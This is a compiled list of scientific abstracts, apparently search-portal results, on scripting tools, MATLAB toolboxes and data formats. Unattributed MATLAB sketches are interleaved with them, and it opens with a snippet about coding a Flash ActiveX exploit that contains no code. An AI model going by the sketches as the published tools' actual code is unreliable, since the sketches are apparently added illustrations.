Flash Player is available as a plugin for most common Web browsers (Firefox, Mozilla, Netscape, Opera) and as an ActiveX control for Internet...script or HTML via (1) a swf file that uses the asfunction: protocol or (2) the navigateToURL function when used with the Flash Player ActiveX ...malicious page or open a malicious file. 2. Coding an Exploit The specific flaw exists in the Flash Player ActiveX Control’s handling of the
Simple proteomics data analysis in the object-oriented PowerShell.
Mohammed, Yassene; Palmblad, Magnus
2013-01-01
Scripting languages such as Perl and Python are appreciated for solving simple, everyday tasks in bioinformatics. A more recent, object-oriented command shell and scripting language, Windows PowerShell, has many attractive features: an object-oriented interactive command line, fluent navigation and manipulation of XML files, ability to consume Web services from the command line, consistent syntax and grammar, rich regular expressions, and advanced output formatting. The key difference between classical command shells and scripting languages, such as bash, and object-oriented ones, such as PowerShell, is that in the latter the result of a command is a structured object with inherited properties and methods rather than a simple stream of characters. Conveniently, PowerShell is included in all new releases of Microsoft Windows and therefore already installed on most computers in classrooms and teaching labs. In this chapter we demonstrate how PowerShell in particular allows easy interaction with mass spectrometry data in XML formats, connection to Web services for tools such as BLAST, and presentation of results as formatted text or graphics. These features make PowerShell much more than "yet another scripting language."
Using STOQS and stoqstoolbox for in situ Measurement Data Access in Matlab
NASA Astrophysics Data System (ADS)
López-Castejón, F.; Schlining, B.; McCann, M. P.
2012-12-01
This poster presents the stoqstoolbox, an extension to Matlab that simplifies the loading of in situ measurement data directly from STOQS databases. STOQS (Spatial Temporal Oceanographic Query System) is a geospatial database tool designed to provide efficient access to data following the CF-NetCDF Discrete Samples Geometries convention. Data are loaded from CF-NetCDF files into a STOQS database where indexes are created on depth, spatial coordinates and other parameters, e.g. platform type. STOQS provides consistent, simple and efficient methods to query for data. For example, we can request all measurements with a standard_name of sea_water_temperature between two times and from between two depths. Data access is simpler because the data are retrieved by parameter irrespective of platform or mission file names. Access is more efficient because data are retrieved via the index on depth and only the requested data are retrieved from the database and transferred into the Matlab workspace. Applications in the stoqstoolbox query the STOQS database via an HTTP REST application programming interface; they follow the Data Access Object pattern, enabling highly customizable query construction. Data are loaded into Matlab structures that clearly indicate latitude, longitude, depth, measurement data value, and platform name. The stoqstoolbox is designed to be used in concert with other tools, such as nctoolbox, which can load data from any OPeNDAP data source. With these two toolboxes a user can easily work with in situ and other gridded data, such as from numerical models and remote sensing platforms. In order to show the capability of stoqstoolbox we will show an example of model validation using data collected during the May-June 2012 field experiment conducted by the Monterey Bay Aquarium Research Institute (MBARI) in Monterey Bay, California. The data are available from the STOQS server at http://odss.mbari.org/canon/stoqs_may2012/query/. Over 14 million data points of 18 parameters from 6 platforms measured over a 3-week period are available on this server. The model used for comparison is the Regional Ocean Modeling System developed by the Jet Propulsion Laboratory for Monterey Bay. The model output is loaded into Matlab using nctoolbox from the JPL server at http://ourocean.jpl.nasa.gov:8080/thredds/dodsC/MBNowcast. Model validation with in situ measurements can be difficult because of different file formats and because data may be spread across individual data systems for each platform. With stoqstoolbox the researcher must know only the URL of the STOQS server and the OPeNDAP URL of the model output. With selected depth and time constraints a user's Matlab program searches for all in situ measurements available for the same time, depth and variable of the model. STOQS and stoqstoolbox are open source software projects supported by MBARI and the David and Lucile Packard foundation. For more information please see http://code.google.com/p/stoqs.
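A minimal sketch of the access pattern described above, not the actual stoqstoolbox API: an HTTP REST endpoint returning JSON is queried and the result lands in a MATLAB structure. The endpoint path and query parameter names below are hypothetical.

% Illustrative sketch (not the stoqstoolbox API): query a REST endpoint that
% returns JSON and load the result into a MATLAB struct with webread.
url  = 'http://odss.mbari.org/canon/stoqs_may2012/api/measuredparameter.json';  % hypothetical endpoint
opts = weboptions('Timeout', 60, 'ContentType', 'json');
data = webread(url, 'parameter__standard_name', 'sea_water_temperature', ...
                    'measurement__depth__lte', 10, opts);   % query filters are assumptions
% data is now a struct (or struct array) with fields such as latitude,
% longitude, depth and value, ready for plotting or model comparison.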
DOE Office of Scientific and Technical Information (OSTI.GOV)
Chung, Youngjoo; Kim, Keeman.
1991-01-01
An operating system shell GPDAS (General Purpose Data Acquisition Shell) on MS-DOS-based microcomputers has been developed to provide flexibility in data acquisition and device control for magnet measurements at the Advanced Photon Source. GPDAS is both a command interpreter and an integrated script-based programming environment. It also incorporates the MS-DOS shell to make use of the existing utility programs for file manipulation and data analysis. Features include: alias definition, virtual memory, windows, graphics, data and procedure backup, background operation, a script programming language, and script-level debugging. Data acquisition system devices can be controlled through an IEEE-488 board, a multifunction I/O board, a digital I/O board and a Gespac crate via the Euro G-64 bus. GPDAS is now being used for diagnostics R&D and accelerator physics studies as well as for magnet measurements. The hardware configurations will also be discussed. 3 refs., 3 figs.
NASA Technical Reports Server (NTRS)
Sen, Syamal K.; Shaykhian, Gholam Ali
2011-01-01
MatLab(TM) (MATrix LABoratory) is a numerical computation and simulation tool used by thousands of scientists and engineers in many countries. MatLab performs purely numerical calculations and can be used as a glorified calculator or as an interpreted programming language; its real strength is in matrix manipulations. Computer algebra functionality is available within the MatLab environment through the Symbolic toolbox. This feature is similar to computer algebra programs, such as Maple or Mathematica, which calculate with mathematical equations using symbolic operations. In its interpreted programming language form (command interface), MatLab is similar to well-known programming languages such as C/C++ and supports data structures and cell arrays to define classes for object-oriented programming. As such, MatLab is equipped with most of the essential constructs of a higher programming language. MatLab is packaged with an editor and debugging functionality useful for analyzing large MatLab programs and finding errors. We believe there are many ways to approach real-world problems; prescribed methods to ensure that solutions are incorporated into the design and analysis of data processing and visualization can benefit engineers and scientists in gaining wider insight into the actual implementation of their respective experiments. This presentation will focus on the data processing and visualization aspects of engineering and scientific applications. Specifically, it will discuss methods and techniques to perform intermediate-level data processing covering engineering and scientific problems. MatLab programming techniques will be discussed, including reading various data file formats to produce customized publication-quality graphics, importing engineering and/or scientific data, organizing data in tabular format, exporting data for use by other software programs such as Microsoft Excel, and data presentation and visualization.
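A minimal MATLAB sketch of the kind of workflow outlined above: import a delimited data file as a table, derive a quantity, produce a labelled publication-quality figure, and export the table for Excel users. File and variable names are placeholders.

% Illustrative data-processing and visualization workflow (placeholder names).
T = readtable('experiment.csv');                 % import tabular data
T.ratio = T.output ./ T.input;                   % derived quantity (assumed columns)
figure
plot(T.time, T.ratio, 'k-', 'LineWidth', 1.5)
xlabel('Time (s)'), ylabel('Output/input ratio')
title('Example experiment'), grid on
print('-dpng', '-r300', 'experiment_ratio.png')  % 300-dpi figure for publication
writetable(T, 'experiment_processed.xlsx')       % export for use in Microsoft Excel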
Brain model of text animation as a data mining strategy.
Astakhova, Tamara; Astakhov, Vadim
2009-01-01
Imagination is a critical element in developing realistic artificial intelligence (AI) systems. One way to approach imagination is to simulate its properties and operations. We developed two models, "Brain Network Hierarchy of Languages" and "Semantical Holographic Calculus," and a simulation system, ScriptWriter, that emulates the process of imagination through automatic animation of English texts. The purpose of this paper is to demonstrate the model and present the "ScriptWriter" system (http://nvo.sdsc.edu/NVO/JCSG/get_SRB_mime_file2.cgi//home/tamara.sdsc/test/demo.zip?F=/home/tamara.sdsc/test/demo.zip&M=application/x-gtar) for simulation of the imagination.
Ellingson, Sally R; Dakshanamurthy, Sivanesan; Brown, Milton; Smith, Jeremy C; Baudry, Jerome
2014-04-25
In this paper we describe the current state of high-throughput virtual screening. We present a case study of using a task-parallel MPI (Message Passing Interface) version of Autodock4 [1], [2] to run a virtual high-throughput screen of one million compounds on the Jaguar Cray XK6 Supercomputer at Oak Ridge National Laboratory. We include a description of the scripts developed to increase the efficiency of the pre-docking file preparation and post-docking analysis. A detailed tutorial, scripts, and source code for this MPI version of Autodock4 are available online at http://www.bio.utk.edu/baudrylab/autodockmpi.htm.
Yaxx: Yet another X-ray extractor
NASA Astrophysics Data System (ADS)
Aldcroft, Tom
2013-06-01
Yaxx is a Perl script that facilitates batch data processing using Perl open source software and commonly available software such as CIAO/Sherpa, S-lang, SAS, and FTOOLS. For Chandra and XMM analysis it includes automated spectral extraction, fitting, and report generation. Yaxx can be run without climbing an extensive learning curve; even so, yaxx is highly configurable and can be customized to support complex analysis. yaxx uses template files and takes full advantage of the unique Sherpa / S-lang environment to make much of the processing user configurable. Although originally developed with an emphasis on X-ray data analysis, yaxx evolved to be a general-purpose pipeline scripting package.
2011-06-01
Briefing-slide excerpt: BML C2 GUI (BMLC2GUI, ICCRTS'11-175); Scripted BML Web Service v2 (09F-SIW-015); publish/subscribe architecture; SBML in NATO MSG-048. Paper 10S-SIW-049 describes a significant ... from the C2LG GUI: open resource, quick response to changes, ease of use, low development cost. Open source at http://c4i.gmu.edu/BML.
UNIX-BASED DATA MANAGEMENT SYSTEM FOR PROPAGATION EXPERIMENTS
NASA Technical Reports Server (NTRS)
Kantak, A. V.
1994-01-01
This collection of programs comprises The UNIX Based Data Management System for the Pilot Field Experiment (PiFEx) which is an attempt to mimic the Mobile Satellite (MSAT) scenario. The major purposes of PiFEx are to define the mobile communications channels and test the workability of new concepts used to design various components of the receiver system. The results of the PiFEx experiment are large amounts of raw data which must be accessed according to a researcher's needs. This package provides a system to manage the PiFEx data in an interactive way. The system not only provides the file handling necessary to retrieve the desired data, but also several FORTRAN programs to generate some standard results pertaining to propagation data. This package assumes that the data file initially generated from the experiment has been already converted from binary to ASCII format. The Data Management system described here consists of programs divided into two categories: those programs that handle the PiFEx generated files and those that are used for number-crunching of these files. Five FORTRAN programs and one UNIX shell script file are used for file manipulation purposes. These activities include calibration of the acquired data and parsing of the large data file into datasets concerned with different aspects of the experiment such as the specific calibrated propagation data, dynamic and static loop error data, statistical data, and temperature and spatial data on the hardware used in the experiment. The five remaining FORTRAN programs are used to generate usable information about the data. Signal level probability, probability density of the signal fitting the Rician density function, frequency of the data's fade duration, and the Fourier transform of the data can all be generated from these data manipulation programs. In addition, a program is provided which generates a downloadable file from the signal levels and signal phases files for use with the plotting routine AKPLOT (NPO-16931). All programs in this package are written in either FORTRAN-77 or UNIX shell-scripts. The package does not include test data. The programs were developed in 1987 for use with a UNIX operating system on a DEC MicroVAX computer.
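The PiFEx programs themselves are FORTRAN-77; purely as an illustration of two of the post-processing steps described above, the following MATLAB sketch forms an empirical probability density of signal level and a Fourier transform of the record, using a synthetic fading envelope rather than PiFEx data.

% Illustrative post-processing sketch: signal-level PDF and spectrum (synthetic data).
fs  = 100;                                   % sample rate [Hz], assumed
sig = abs(1 + 0.3*(randn(4096,1) + 1i*randn(4096,1)));   % synthetic fading envelope
[counts, edges] = histcounts(sig, 50, 'Normalization', 'pdf');
centers = edges(1:end-1) + diff(edges)/2;
subplot(2,1,1), bar(centers, counts), xlabel('Signal level'), ylabel('PDF')
S = fft(sig - mean(sig));                    % spectrum of the fluctuations
f = (0:numel(S)-1)*fs/numel(S);
subplot(2,1,2), plot(f(1:end/2), abs(S(1:end/2)))
xlabel('Frequency (Hz)'), ylabel('|FFT|')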
A Google Earth Grand Tour of the Terrestrial Planets
ERIC Educational Resources Information Center
De Paor, Declan; Coba, Filis; Burgin, Stephen
2016-01-01
Google Earth is a powerful instructional resource for geoscience education. We have extended the virtual globe to include all terrestrial planets. Downloadable Keyhole Markup Language (KML) files (Google Earth's scripting language) associated with this paper include lessons about Mercury, Venus, the Moon, and Mars. We created "grand…
ISMRM Raw Data Format: A Proposed Standard for MRI Raw Datasets
Inati, Souheil J.; Naegele, Joseph D.; Zwart, Nicholas R.; Roopchansingh, Vinai; Lizak, Martin J.; Hansen, David C.; Liu, Chia-Ying; Atkinson, David; Kellman, Peter; Kozerke, Sebastian; Xue, Hui; Campbell-Washburn, Adrienne E.; Sørensen, Thomas S.; Hansen, Michael S.
2015-01-01
Purpose: This work proposes the ISMRM Raw Data (ISMRMRD) format as a common MR raw data format, which promotes algorithm and data sharing. Methods: A file format consisting of a flexible header and tagged frames of k-space data was designed. Application Programming Interfaces were implemented in C/C++, MATLAB, and Python. Converters for Bruker, General Electric, Philips, and Siemens proprietary file formats were implemented in C++. Raw data were collected using MRI scanners from four vendors, converted to ISMRMRD format, and reconstructed using software implemented in three programming languages (C++, MATLAB, Python). Results: Images were obtained by reconstructing the raw data from all vendors. The source code, raw data, and images comprising this work are shared online, serving as an example of an image reconstruction project following a paradigm of reproducible research. Conclusion: The proposed raw data format solves a practical problem for the MRI community. It may serve as a foundation for reproducible research and collaborations. The ISMRMRD format is a completely open and community-driven format, and the scientific community is invited (including commercial vendors) to participate either as users or developers. PMID:26822475
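As a generic illustration of the reconstruction step, not the ISMRMRD API, the following MATLAB sketch recovers an image from fully sampled Cartesian k-space with an inverse 2-D FFT (the phantom function requires the Image Processing Toolbox; real k-space would be read from an ISMRMRD file instead of being simulated).

% Generic Cartesian reconstruction sketch with synthetic k-space data.
img_true = phantom(256);                            % synthetic object
kspace   = fftshift(fft2(ifftshift(img_true)));     % simulated k-space data
img_rec  = fftshift(ifft2(ifftshift(kspace)));      % reconstruction by inverse 2-D FFT
imagesc(abs(img_rec)), axis image off, colormap gray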
Resources for comparing the speed and performance of medical autocoders.
Berman, Jules J
2004-06-15
Concept indexing is a popular method for characterizing medical text, and is one of the most important early steps in many data mining efforts. Concept indexing differs from simple word or phrase indexing because concepts are typically represented by a nomenclature code that binds a medical concept to all equivalent representations. A concept search on the term renal cell carcinoma would be expected to find occurrences of hypernephroma and renal carcinoma (concept equivalents). The purpose of this study is to provide freely available resources to compare speed and performance among different autocoders. These tools consist of: 1) a public domain autocoder written in Perl (a free and open source programming language that installs on any operating system); 2) a nomenclature database derived from the unencumbered subset of the publicly available Unified Medical Language System; 3) a large corpus of autocoded output derived from a publicly available medical text. A simple lexical autocoder was written that parses plain text into a listing of all 1-, 2-, 3-, and 4-word strings contained in the text, assigning a nomenclature code for text strings that match terms in the nomenclature. The nomenclature used is the unencumbered subset of the 2003 Unified Medical Language System (UMLS). The unencumbered subset of UMLS was reduced to exclude homonymous one-word terms and proper names, resulting in a term/code data dictionary containing about a half million medical terms. The Online Mendelian Inheritance in Man (OMIM), a 92+ Megabyte publicly available medical opus, was used as sample medical text for the autocoder. The autocoding Perl script is remarkably short, consisting of just 38 command lines. The 92+ Megabyte OMIM file was completely autocoded in 869 seconds on a 2.4 GHz processor (less than 10 seconds per Megabyte of text). The autocoded output file (9,540,442 bytes) contains 367,963 coded terms from OMIM and is distributed with this manuscript. A public domain Perl script is provided that can parse through plain-text files of any length, matching concepts against an external nomenclature. The script and associated files can be used freely to compare the speed and performance of autocoding software.
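A minimal MATLAB sketch of the lexical autocoding algorithm described above (the original is a 38-line Perl script): the text is broken into 1- to 4-word strings and each string is looked up in a term-to-code dictionary. The dictionary entries and codes below are placeholders, not UMLS content.

% Illustrative lexical autocoder: match 1- to 4-word strings against a dictionary.
dict = containers.Map({'renal cell carcinoma','hypernephroma'}, {'CODE0001','CODE0001'});  % placeholder codes
text  = lower('A case of hypernephroma, also called renal cell carcinoma.');
words = strsplit(regexprep(text, '[^a-z ]', ' '));   % keep letters only, split on spaces
words = words(~cellfun(@isempty, words));
for n = 1:4
    for i = 1:numel(words) - n + 1
        phrase = strjoin(words(i:i+n-1), ' ');
        if isKey(dict, phrase)
            fprintf('%s -> %s\n', phrase, dict(phrase));   % report matched concept code
        end
    end
end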
SOCIB Glider toolbox: from sensor to data repository
NASA Astrophysics Data System (ADS)
Pau Beltran, Joan; Heslop, Emma; Ruiz, Simón; Troupin, Charles; Tintoré, Joaquín
2015-04-01
Nowadays in oceanography, gliders constitute a mature, cost-effective technology for the acquisition of measurements independently of the sea state (unlike ships), providing subsurface data during sustained periods, including extreme weather events. The SOCIB glider toolbox is a set of MATLAB/Octave scripts and functions developed in order to manage the data collected by a glider fleet. They cover the main stages of the data management process, both in real-time and delayed-time modes: metadata aggregation, downloading, processing, and automatic generation of data products and figures. The toolbox is distributed under the GNU licence (http://www.gnu.org/copyleft/gpl.html) and is available at http://www.socib.es/users/glider/glider_toolbox.
NASA Astrophysics Data System (ADS)
Grzesik, W.; Niesłony, P.; Laskowski, P.
2017-12-01
In this paper, a special procedure for predicting the parameters of Johnson-Cook constitutive material models is proposed, based on experimental data and specially developed MATLAB scripts which allow advanced modeling of complex 3D response surfaces. The experimental investigations cover two different strain rates of 10^-3 and 10^1 1/s and testing temperatures ranging from ambient up to 700 °C. As a result, a set of mathematical equations which fit the experimental data is determined. The applicability of the experimentally derived constitutive models to FEM modeling of real machining processes of Inconel 718 alloy is verified.
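A minimal MATLAB sketch of fitting the Johnson-Cook constants (A, B, n, C, m) to flow-stress data by least squares; the data points, reference values and initial guess are placeholders, not the Inconel 718 measurements or the authors' scripts.

% Illustrative least-squares fit of Johnson-Cook constants (placeholder data).
eps    = [0.05 0.10 0.20 0.05 0.10 0.20]';     % plastic strain
epsdot = [1e-3 1e-3 1e-3 1e1 1e1 1e1]';        % strain rate [1/s]
T      = [20 20 20 500 500 500]';              % temperature [degC]
sigma  = [1100 1180 1260 950 1010 1070]';      % measured flow stress [MPa] (synthetic)
epsdot0 = 1e-3;  Troom = 20;  Tmelt = 1300;    % reference values (assumed)
Tstar  = (T - Troom)/(Tmelt - Troom);          % homologous temperature
jc  = @(p) (p(1) + p(2)*eps.^p(3)) .* (1 + p(4)*log(epsdot/epsdot0)) ...
           .* (1 - Tstar.^p(5));               % p = [A B n C m]
obj = @(p) sum((jc(p) - sigma).^2);            % sum of squared residuals
p0  = [1000 500 0.5 0.01 1.2];                 % initial guess
p   = fminsearch(obj, p0);
fprintf('A=%.0f  B=%.0f  n=%.2f  C=%.4f  m=%.2f\n', p);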
DOVIS 2.0: an efficient and easy to use parallel virtual screening tool based on AutoDock 4.0.
Jiang, Xiaohui; Kumar, Kamal; Hu, Xin; Wallqvist, Anders; Reifman, Jaques
2008-09-08
Small-molecule docking is an important tool in studying receptor-ligand interactions and in identifying potential drug candidates. Previously, we developed a software tool (DOVIS) to perform large-scale virtual screening of small molecules in parallel on Linux clusters, using AutoDock 3.05 as the docking engine. DOVIS enables the seamless screening of millions of compounds on high-performance computing platforms. In this paper, we report significant advances in the software implementation of DOVIS 2.0, including enhanced screening capability, improved file system efficiency, and extended usability. To keep DOVIS up-to-date, we upgraded the software's docking engine to the more accurate AutoDock 4.0 code. We developed a new parallelization scheme to improve runtime efficiency and modified the AutoDock code to reduce excessive file operations during large-scale virtual screening jobs. We also implemented an algorithm to output docked ligands in an industry standard format, sd-file format, which can be easily interfaced with other modeling programs. Finally, we constructed a wrapper-script interface to enable automatic rescoring of docked ligands by arbitrarily selected third-party scoring programs. The significance of the new DOVIS 2.0 software compared with the previous version lies in its improved performance and usability. The new version makes the computation highly efficient by automating load balancing, significantly reducing excessive file operations by more than 95%, providing outputs that conform to industry standard sd-file format, and providing a general wrapper-script interface for rescoring of docked ligands. The new DOVIS 2.0 package is freely available to the public under the GNU General Public License.
HEART: an automated beat-to-beat cardiovascular analysis package using Matlab.
Schroeder, Mark J; Perreault, Bill; Ewert, Daniel L; Koenig, Steven C
2004-07-01
A computer program is described for beat-to-beat analysis of cardiovascular parameters from high-fidelity pressure and flow waveforms. The Hemodynamic Estimation and Analysis Research Tool (HEART) is a post-processing analysis software package developed in Matlab that enables scientists and clinicians to document, load, view, calibrate, and analyze experimental data that have been digitally saved in ASCII or binary format. Analysis routines include traditional hemodynamic parameter estimates as well as more sophisticated analyses such as lumped arterial model parameter estimation and vascular impedance frequency spectra. Cardiovascular parameter values of all analyzed beats can be viewed and statistically analyzed. An attractive feature of the HEART program is the ability to analyze data with visual quality assurance throughout the process, thus establishing a framework through which Good Laboratory Practice (GLP) compliance can be achieved. Additionally, the development of HEART on the Matlab platform provides users with the flexibility to adapt or create study-specific analysis files according to their specific needs. Copyright 2003 Elsevier Ltd.
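A minimal sketch of the kind of beat-to-beat processing HEART performs, not HEART code: beats are detected in a pressure waveform and per-beat systolic, diastolic and mean pressures are reported (findpeaks requires the Signal Processing Toolbox; the waveform is synthetic).

% Illustrative beat-to-beat analysis of a synthetic pressure waveform.
fs = 250;                                            % sample rate [Hz]
t  = (0:1/fs:10)';
p  = 90 + 30*max(sin(2*pi*1.2*t), 0) + 2*randn(size(t));   % synthetic pressure [mmHg]
[~, locs] = findpeaks(p, 'MinPeakHeight', 105, 'MinPeakDistance', 0.5*fs);  % beat peaks
for k = 1:numel(locs)-1
    beat = p(locs(k):locs(k+1));                     % one beat, peak to peak
    fprintf('beat %2d: sys %.0f  dia %.0f  mean %.0f mmHg\n', ...
            k, max(beat), min(beat), mean(beat));
end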
Gene Expression Dynamics Inspector (GEDI): for integrative analysis of expression profiles
NASA Technical Reports Server (NTRS)
Eichler, Gabriel S.; Huang, Sui; Ingber, Donald E.
2003-01-01
Genome-wide expression profiles contain global patterns that evade visual detection in current gene clustering analysis. Here, a Gene Expression Dynamics Inspector (GEDI) is described that uses self-organizing maps to translate high-dimensional expression profiles of time courses or sample classes into animated, coherent and robust mosaic images. GEDI facilitates identification of interesting patterns of molecular activity simultaneously across gene, time and sample space without prior assumption of any structure in the data, and then permits the user to retrieve genes of interest. Important changes in genome-wide activities may be quickly identified based on 'Gestalt' recognition and hence, GEDI may be especially useful for non-specialist end users, such as physicians. AVAILABILITY: GEDI v1.0 is written in Matlab, and binary Matlab .dll files, which require Matlab to run, can be downloaded for free by academic institutions at http://www.chip.org/ge/gedihome.html Supplementary information: http://www.chip.org/ge/gedihome.html.
Risk Assessment Update: Russian Segment
NASA Technical Reports Server (NTRS)
Christiansen, Eric; Lear, Dana; Hyde, James; Bjorkman, Michael; Hoffman, Kevin
2012-01-01
BUMPER-II version 1.95j source code was provided to RSC-E and Khrunichev at the January 2012 MMOD TIM in Moscow. The MEMCxP and ORDEM 3.0 environments are implemented as external data files. NASA provided a sample ORDEM 3.0 ".key" & ".daf" environment file set for demonstrating and benchmarking the BUMPER-II v1.95j installation at the Jan-12 TIM. ORDEM 3.0 has been completed and is currently in beta testing. NASA will provide a preliminary set of ORDEM 3.0 ".key" & ".daf" environment files for the years 2012 through 2028. Bumper output files produced using the new ORDEM 3.0 data files are intended for internal use only, not for requirements verification. Output files will contain the words "ORDEM FILE DESCRIPTION = PRELIMINARY VERSION: not for production." The projectile density term in many BUMPER-II ballistic limit equations will need to be updated. Cube demo scripts and output files delivered at the Jan-12 TIM have been updated for the new ORDEM 3.0 data files. Risk assessment results based on ORDEM 3.0 and MEM will be presented for the Russian Segment (RS) of ISS.
NASA Technical Reports Server (NTRS)
2008-01-01
The Aquarius Radiometer, a subsystem of the Aquarius Instrument, required a data acquisition ground system to support calibration and radiometer performance assessment. To support calibration and compose performance assessments, we developed an automated system which uploaded raw data to an FTP server and saved raw and processed data to a database. This paper details the overall functionalities of the Aquarius Instrument Science Data System (ISDS) and the individual electrical ground support equipment (EGSE) which produced data files that were infused into the ISDS. Real-time EGSEs include an ICDS Simulator, a Calibration GSE, a LabVIEW-controlled power supply, and a chamber data acquisition system. The ICDS Simulator serves as the test conductor's primary workstation, collecting radiometer housekeeping (HK) and science data and passing commands and HK telemetry collection requests to the radiometer. The Calibration GSE (Radiometer Active Test Source) provides a choice of source from multiple targets for the radiometer's external calibration. The Power Supply GSE, controlled by LabVIEW, provides real-time voltage and current monitoring of the radiometer. Finally, the chamber data acquisition system produces data reflecting chamber vacuum pressure, thermistor temperatures, AVG and watts. Each GSE system produces text-based data files every two to six minutes and automatically copies the data files to the Central Archiver PC. The Archiver PC stores the data files, schedules automated uploads of these files to an external FTP server, and accepts requests to copy all data files to the ISDS for offline data processing and analysis. The Aquarius Radiometer ISDS contains PHP and MATLAB programs to parse, process and save all data to a MySQL database. Analysis tools (MATLAB programs) in the ISDS system are capable of displaying radiometer science, telemetry and auxiliary data in near real time as well as performing data analysis and producing automated performance assessment reports of the Aquarius Radiometer.
NASA Technical Reports Server (NTRS)
Dooling, Robert J.
2012-01-01
NASA Engineering's Orion Script Generator (OSG) is a program designed to run on Exploration Flight Test One software. The script generator creates a SuperScript file that, when run, accepts the filename for a listing of Compact Unique Identifiers (CUIs). These CUIs correspond to different variables on the Orion spacecraft, such as the temperature of a component X, the active or inactive status of another component Y, and so on. OSG uses a linked database to retrieve the value for each CUI, such as "100 05," "True," and so on. Finally, OSG writes SuperScript code to display each of these variables before outputting the ssi file that allows recipients to view a graphical representation of Orion Flight Test One's status through these variables. This project's main challenge was creating flexible software that accepts and transfers many types of data, from Boolean (true or false) values to "Unsigned Long Long" values (any number from 0 to 18,446,744,073,709,551,615). We also needed to allow bit manipulation for each variable, requiring us to program functions that could convert any of the multiple types of data into binary code. Throughout the project, we explored different methods to optimize the speed of working with the CUI database and long binary numbers. For example, the program handled extended binary numbers much more efficiently when we stored them as collections of Boolean values (true or false representing 1 or 0) instead of as collections of character strings or numbers. We also strove to make OSG as user-friendly and accommodating of different needs as possible: its default behavior is to display a current CUI's maximum value and minimum value with three to five intermediate values in between, all in descending order. Fortunately, users can also add other input on the same lines as each CUI name to request different high values, low values, display options (ascending, sine, and so on), and interval sizes for generating intermediate values. Developing input validation took up quite a bit of time, but OSG's flexibility in the end was worth it.
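A minimal MATLAB sketch of the bit-level handling described above: an unsigned 64-bit value is converted to a vector of logical (Boolean) bits and reassembled; the value is an arbitrary placeholder, not an Orion CUI.

% Illustrative round trip between a uint64 value and a vector of Boolean bits.
x    = intmax('uint64') - uint64(12345);    % arbitrary placeholder value
bits = logical(bitget(x, 64:-1:1));         % 64 Booleans, most-significant bit first
y = uint64(0);                              % reassemble, staying in uint64 arithmetic
for k = 1:64
    if bits(k)
        y = bitset(y, 64 - k + 1);          % set the corresponding bit
    end
end
isequal(x, y)                               % returns true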
Data Provenance as a Tool for Debugging Hydrological Models based on Python
NASA Astrophysics Data System (ADS)
Wombacher, A.; Huq, M.; Wada, Y.; Van Beek, R.
2012-12-01
There is an increase in the data volume used in hydrological modeling. The increasing data volume requires additional effort in debugging models, since a single output value is influenced by a multitude of input values. Thus, it is difficult to keep an overview of the data dependencies. Further, even knowing these dependencies, it is a tedious job to infer all the relevant data values. The aforementioned data dependencies are also known as data provenance, i.e. the determination of how a particular value has been created and processed. The proposed tool infers the data provenance automatically from a Python script and visualizes the dependencies as a graph without executing the script. To debug the model, the user specifies the value of interest in space and time. The tool infers all related data values and displays them in the graph. The tool has been evaluated by hydrologists developing a model for estimating the global water demand [1]. The model uses multiple different data sources. The script we analysed has 120 lines of code and uses more than 3000 individual files, each of them representing a raster map of 360*720 cells. After importing the data of the files into a SQLite database, the data consume around 40 GB of memory. Using the proposed tool, a modeler is able to select individual values and infer which values have been used to calculate them. Especially in cases of outliers or missing values, it is a beneficial tool that provides the modeler with efficient information to investigate the unexpected behavior of the model. The proposed tool can be applied to many Python scripts and has been tested with other scripts in different contexts. In case a Python script contains an unknown function or class, the tool requests additional information about the used function or class to enable the inference. This information has to be entered only once and can be shared with colleagues or in the community. Reference [1] Y. Wada, L. P. H. van Beek, D. Viviroli, H. H. Dürr, R. Weingartner, and M. F. P. Bierkens, "Global monthly water stress: II. water demand and severity of water," Water Resources Research, vol. 47, 2011.
Parallel File System I/O Performance Testing On LANL Clusters
DOE Office of Scientific and Technical Information (OSTI.GOV)
Wiens, Isaac Christian; Green, Jennifer Kathleen
2016-08-18
These are slides from a presentation on parallel file system I/O performance testing on LANL clusters. I/O is a known bottleneck for HPC applications. Performance optimization of I/O is often required. This summer project entailed integrating IOR under Pavilion and automating the results analysis. The slides cover the following topics: scope of the work, tools utilized, IOR-Pavilion test workflow, build script, IOR parameters, how parameters are passed to IOR, *run_ior: functionality, Python IOR-Output Parser, Splunk data format, Splunk dashboard and features, and future work.
Laamrani, Ahmed; Branson, Dave; Joosse, Pamela
2018-01-01
Quantifying the amount of crop residue left in the field after harvest is a key issue for sustainability. Conventional assessment approaches (e.g., line-transect) are labor intensive, time-consuming and costly. Many proximal remote sensing devices and systems have been developed for agricultural applications such as cover crop and residue mapping. For instance, current mobile devices (smartphones & tablets) are usually equipped with digital cameras and global positioning systems and use applications (apps) for in-field data collection and analysis. In this study, we assess the feasibility and strength of a mobile device app developed to estimate crop residue cover. The performance of this novel technique (from here on referred to as “app” method) was compared against two point counting approaches: an established digital photograph-grid method and a new automated residue counting script developed in MATLAB at the University of Guelph. Both photograph-grid and script methods were used to count residue under 100 grid points. Residue percent cover was estimated using the app, script and photograph-grid methods on 54 vertical digital photographs (images of the ground taken from above at a height of 1.5 m) collected from eighteen fields (9 corn and 9 soybean, 3 samples each) located in southern Ontario. Results showed that residue estimates from the app method were in good agreement with those obtained from both photograph–grid and script methods (R2 = 0.86 and 0.84, respectively). This study has found that the app underestimates the residue coverage by −6.3% and −10.8% when compared to the photograph-grid and script methods, respectively. With regards to residue type, soybean has a slightly lower bias than corn (i.e., −5.3% vs. −7.4%). For photos with residue <30%, the app derived residue measurements are within ±5% difference (bias) of both photograph-grid- and script-derived residue measurements. These methods could therefore be used to track the recommended minimum soil residue cover of 30%, implemented to reduce farmland topsoil and nutrient losses that impact water quality. Overall, the app method was found to be a good alternative to the point counting methods, which are more time-consuming. PMID:29495497
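A minimal MATLAB sketch of the grid-point counting idea behind the script and photograph-grid methods; the file name, 10 x 10 grid and brightness threshold are placeholder assumptions and do not reproduce the published script's classification rules (rgb2gray requires the Image Processing Toolbox).

% Illustrative grid-point residue count from a vertical ground photograph.
img  = imread('field_photo.jpg');            % placeholder file name
gray = rgb2gray(img);
[nr, nc] = size(gray);
rows = round(linspace(1, nr, 12));  rows = rows(2:11);   % 10 interior rows
cols = round(linspace(1, nc, 12));  cols = cols(2:11);   % 10 interior columns
[R, C] = meshgrid(rows, cols);
samples = gray(sub2ind(size(gray), R(:), C(:)));         % 100 grid-point pixels
isResidue = samples > 140;                               % assumed brightness threshold
residuePct = 100*mean(isResidue);
fprintf('Estimated residue cover: %.0f%%\n', residuePct);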
SnopViz, an interactive snow profile visualization tool
NASA Astrophysics Data System (ADS)
Fierz, Charles; Egger, Thomas; Gerber, Matthias; Bavay, Mathias; Techel, Frank
2016-04-01
